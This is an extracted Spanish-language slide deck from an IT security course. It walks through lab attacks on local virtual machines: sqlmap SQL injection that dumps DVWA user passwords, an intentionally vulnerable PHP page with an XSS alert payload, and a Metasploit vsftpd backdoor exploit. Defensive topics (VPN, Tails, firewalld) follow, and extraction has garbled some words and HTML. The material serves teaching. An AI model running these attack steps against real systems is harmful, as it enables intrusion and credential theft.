Seguridad De TI - 16 - Seguridad de las redes

Page 1

información Seguridad de las redes

Ingeniería de sistemas y computación

Seguridad en infraestructura de tecnología de la

Johan jsgiraldoh.ioGiraldo

Advertencia 27/08/2022 Seguridad en infraestructura de tecnología de la información 2

Seguridad en infraestructura de tecnología de la información

Advertencia

Toda la información y herramientas que se proveen son con fines educativos y con el propósito de formar un profesional con valores y principios que puedan aportar a la sociedad.

27/08/2022

En todos los capítulos de esta formación se recalcan los valores y principios éticos obtenidos por la persona en su hogar y educación.

3

Es un delito, hacer laboratorios de hacking en ambientes no permitidos.

22/08/2022 Seguridad

4

Advertencia

Por este motivo usaremos la plataforma hackthebox y entornos locales. en infraestructura de tecnología de la información

¡MEME! 25/08/2022 Seguridad en infraestructura de tecnología de la información 5

Vulnerabilidad es el riesgo que una persona, sistema u objeto puede sufrir frente a peligros inminentes, sean ellos desastres naturales, desigualdades probabilidadetimológicamente,sufijoEstáLaeconómicas,políticas,socialesoculturales.palabravulnerabilidadderivadellatínvulnerabilis.compuestoporvulnus,quesignifica'herida',yel-abilis,queindicaposibilidad;porlotanto,vulnerabilidadindicaunamayordeserherido.

27/08/2022 Seguridad en infraestructura de tecnología de la información 6

Quéesvulnerabilidad

Tiposdevulnerabilidad

7

27/08/2022

Todas las cosas, objetos, personas y situaciones sufren de vulnerabilidad frente a algo. Dependiendo de la naturaleza de la debilidad, se definen tipos de vulnerabilidad. De esta manera, se pueden buscar mejoras específicas para cada carencia. Algunos de los campos más estudiados de vulnerabilidad son: Vulnerabilidad informática: se refiere a los puntos débiles de un sistema computacional donde su seguridad informática no tiene defensas necesarias en caso de un ataque.

Seguridad en infraestructura de tecnología de la información

El OWASP Top 10 es un documento de concienciación estándar para desarrolladores y seguridad de aplicaciones web. Representa un amplio consenso sobre los riesgos de seguridad más críticos para las aplicaciones web.

OWASPTopTen

Seguridad en infraestructura de tecnología de la información

27/08/2022

8

enSqlmapparahacersqlinjectiondvwa 27/08/2022 Seguridad en infraestructura de tecnología de la información 9

Sqlmap para hacer sql injection en dvwa ◼Descargar y ejecutar las dos siguientes máquinas le/https://sourceforge.net/projects/metasploitabchineshttps://www.kali.org/get-kali/#kali-virtual-mavirtuales 27/08/2022 Seguridad en infraestructura de tecnología de la información 10

Sqlmap para hacer sql injection en dvwa ◼Averiguar la dirección ip de nuestro objetivo, en este caso metasploitable2. ifconfig/ip a/ip a s 27/08/2022 Seguridad en infraestructura de tecnología de la información 11

Sqlmap para hacer sql injection en dvwa 27/08/2022 Seguridad en infraestructura de tecnología de la información 12

Sqlmap para hacer sql injection endvwa ◼A Través del navegador web ingresar a la dirección ip de la máquina metasploitable. 192.168.189.131 27/08/2022 Seguridad en infraestructura de tecnología de la información 13

Sqlmap para hacer sql injection endvwa 27/08/2022 Seguridad en infraestructura de tecnología de la información 14

Sqlmap para hacer sql injection endvwa 27/08/2022 Seguridad en infraestructura de tecnología de la información 15

Sqlmap para hacer sql injection endvwa 27/08/2022 Seguridad en infraestructura de tecnología de la información 16

Sqlmap para hacer sql injection endvwa ◼ sqlmap -u "http://192.168.189.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" -cookie="security=high; PHPSESSID=883b421191e99da29e020be5dd14715f" ◼ sqlmap -u "http://192.168.189.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" -cookie="security=high; PHPSESSID=883b421191e99da29e020be5dd14715f" --dbs ◼ sqlmap -u "http://192.168.189.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" -cookie="security=high; PHPSESSID=883b421191e99da29e020be5dd14715f" --tables -D dvwa ◼ sqlmap -u "http://192.168.189.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" -cookie="security=high; PHPSESSID=883b421191e99da29e020be5dd14715f" --tables -D dvwa -T users --columns ◼ sqlmap -u "http://192.168.189.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" -cookie="security=high; PHPSESSID=883b421191e99da29e020be5dd14715f" --tables -D dvwa -T users --columns -C "user, avatar, first_name, last_name, password, user_id" ◼ sqlmap -u "http://192.168.189.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" -cookie="security=high; PHPSESSID=883b421191e99da29e020be5dd14715f" --tables -D dvwa -T users --columns -C "user, avatar, first_name, last_name, password, user_id" --dump 27/08/2022 Seguridad en infraestructura de tecnología de la información 17

Cross Site Scripting (XSS): Guía de defensa y ataque ◼ Descargar la imagen de docker jsgiraldoh/httpddockerphp-modldappulljsgiraldoh/httpd-php-modldap ◼ Ejecutar un contenedor de docker con la imagen dockeranterior run -dit --name container-xss-app -p 8080:80jsgiraldoh/httpd-php-modldap 27/08/2022 Seguridad en infraestructura de tecnología de la información 18

Cross Site Scripting (XSS): Guía de defensa y ataque ◼Ingresar al siguiente link https://red-orbita.com/?p=418 ◼Crear los dos archivos (index.php yXSS.php) 27/08/2022 Seguridad en infraestructura de tecnología de la información 19

Cross Site Scripting (XSS): Guía de defensa y ataque <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html <meta<head>xmlns="http://www.w3.org/1999/xhtml">http-equiv="Content-Type"content="text/html; charset=iso-8859-1" /> <style type="text/css"> body,td,th<!-- { color: #FFFFFF; body}background-color:{ #000000; </style><title>Simple-->} XSS vulnerability by Xylitol</title> <form<body>action="XSS.php" method="post"> <p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p> <div<tablealign="center">width="270" border="0"> <tr><td<tdwidth="106"><strong>Search:</strong></td>width="154"><inputname="Vulnerability"type="text" id="Vulnerability" /></td> <table</table></tr>width="268" border="0"> <tr><td width="262"><div align="center"> <input name="submit" type="submit" value=" Search it ! " /> </html></body></form></div></table></tr></div></td> 27/08/2022 Seguridad en infraestructura de tecnología de la información 20

Cross Site Scripting (XSS): Guía de defensa y ataque <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" </html></body><span>Search<body></style></head>-->}body}body,td,th<!--<style<title>Search<meta<head><html"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">xmlns="http://www.w3.org/1999/xhtml">http-equiv="Content-Type"content="text/html;charset=iso-8859-1"/>result:</title>type="text/css">{color:#FFFFFF;{background-color:#000000;result:</span><strong><?phpecho$_POST['Vulnerability'];?></strong> 27/08/2022 Seguridad en infraestructura de tecnología de la información 21

Cross Site Scripting (XSS): Guía de defensa y ataque ◼ Copiar los dos archivos al contenedor anteriormente creado en la ruta /var/www/app docker cp index.html container-xss-app:/var/www/app docker cp XSS.php container-xss-app:/var/www/app ◼ Ingresar al contendor, dirigirse a la ruta /var/www/app y cambiar los permisos del archivo index.php chmod 755 index.php 27/08/2022 Seguridad en infraestructura de tecnología de la información 22

Cross Site Scripting (XSS): Guía de defensa y ataque ◼Ingresar a localhost:8080 ◼Abrir la página e <script>alert('Red-Orbita')</script>introducir 27/08/2022 Seguridad en infraestructura de tecnología de la información 23

Cross Site Scripting (XSS): Guía de defensa y ataque 27/08/2022 Seguridad en infraestructura de tecnología de la información 24

Cross Site Scripting (XSS): Guía de defensa y ataque 27/08/2022 Seguridad en infraestructura de tecnología de la información 25

bleSimplePenetrationMetasploita

27/08/2022 Seguridad en infraestructura de tecnología de la información 26

Simple Penetration Metasploitable ◼Descargar y ejecutar las dos siguientes máquinas le/https://sourceforge.net/projects/metasploitabchineshttps://www.kali.org/get-kali/#kali-virtual-mavirtuales 27/08/2022 Seguridad en infraestructura de tecnología de la información 27

Simple Penetration Metasploitable ◼Averiguar la dirección ip de nuestro objetivo, en este caso metasploitable2. ifconfig/ip a/ip a s 27/08/2022 Seguridad en infraestructura de tecnología de la información 28

Simple Penetration Metasploitable 27/08/2022 Seguridad en infraestructura de tecnología de la información 29

Simple Penetration Metasploitable ◼Posteriormente con la información del objetivo, proceder a ejecutar un escaneo. nmap -sV -O 192.168.189.131 27/08/2022 Seguridad en infraestructura de tecnología de la información 30

Simple Penetration Metasploitable 27/08/2022 Seguridad en infraestructura de tecnología de la información 31

Simple Penetration Metasploitable 27/08/2022 Seguridad en infraestructura de tecnología de la información 32

Simple Penetration Metasploitable ◼Ejecutar el siguiente comando msfconsole 27/08/2022 Seguridad en infraestructura de tecnología de la información 33

Simple Penetration Metasploitable 27/08/2022 Seguridad en infraestructura de tecnología de la información 34

Simple Penetration Metasploitable 27/08/2022 Seguridad en infraestructura de tecnología de la información 35

Simple Penetration Metasploitable ◼Ejecutar el siguiente comando use exploit/unix/ftp/vsftpd_234_backdoor 27/08/2022 Seguridad en infraestructura de tecnología de la información 36

Simple Penetration Metasploitable ◼Ejecutar el siguiente comando show options 27/08/2022 Seguridad en infraestructura de tecnología de la información 37

Simple Penetration Metasploitable 27/08/2022 Seguridad en infraestructura de tecnología de la información 38

Simple Penetration Metasploitable ◼Ejecutar el siguiente comando set RHOSTS 192.168.189.131 27/08/2022 Seguridad en infraestructura de tecnología de la información 39

Simple Penetration Metasploitable 27/08/2022 Seguridad en infraestructura de tecnología de la información 40

Simple Penetration Metasploitable ◼Ejecutar el siguiente comando exploit/run 27/08/2022 Seguridad en infraestructura de tecnología de la información 41

Simple Penetration Metasploitable 27/08/2022 Seguridad en infraestructura de tecnología de la información 42

Virtual Private NetworkWireGuard ◼ Crear un directorio de trabajo mkdir wireguard ◼ Descargar el archivo docker-compose del siguiente link https://github.com/docker/awesome-compose ◼ Ejecutar el siguiente comando en una máquina virtual docker-compose(debian/ubuntu/kalilinux)up-d 27/08/2022 Seguridad en infraestructura de tecnología de la información 43

Virtual Private NetworkWireGuard ◼Descargar el cliente de https://www.wireguard.com/install/wireguard ◼Abrir la aplicación o el cliente de wireguard e importar o escanear los archivos peer.conf 27/08/2022 Seguridad en infraestructura de tecnología de la información 44

Virtual Private NetworkWireGuard 27/08/2022 Seguridad en infraestructura de tecnología de la información 45

Virtual Private NetworkWireGuard 27/08/2022 Seguridad en infraestructura de tecnología de la información 46

Virtual Private NetworkWireGuard 27/08/2022 Seguridad en infraestructura de tecnología de la información 47

VirtualPrivateNetwork 27/08/2022 Seguridad en infraestructura de tecnología de la información 48

49

◼mlhttps://tails.boum.org/install/linux/index.es.ht 27/08/2022 Seguridad

Tails

Caja de herramientas de seguridad digital Tails incluye una selección de aplicaciones para trabajar en documentos confidenciales y para comunicarse de forma segura.Todo enTails está listo para usar y tiene una configuración segura por defecto. en infraestructura de tecnología de la información

Configurar las opciones de firewall ◼ Instalar y habilitar firewalld systemctl status firewalld ◼ Explorar las zonas predeterminadas firewall-cmd --get-default-zone firewall-cmd --get-active-zones firewall-cmd --list-all ◼ Explorar zonas alternativas firewall-cmd --get-zones ◼ Establecer reglas para sus aplicaciones - Agregar un servicio a sus zonas firewall-cmd --get-services firewall-cmd --permanent --add-service=http ◼ Abrir un puerto para sus zonas firewall-cmd --zone=public --permanent --add-port=5000/tcp firewall-cmd --reload firewall-cmd --zone=public --list-ports 27/08/2022 Seguridad en infraestructura de tecnología de la información 50

¡HappyHacking! 27/08/2022 Seguridad en infraestructura de tecnología de la información 51

Referencias ◼"Vulnerabilidad". En: Significados.com. Disponible en: Consultado:https://www.significados.com/vulnerabilidad/27deagostode2022,05:40pm. ◼https://owasp.org/www-project-top-ten/ ◼https://red-orbita.com/?p=418 ◼eshow-to-set-up-a-firewall-using-firewalld-on-centos-8-https://www.digitalocean.com/community/tutorials/ 27/08/2022 Seguridad en infraestructura de tecnología de la información 52

Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.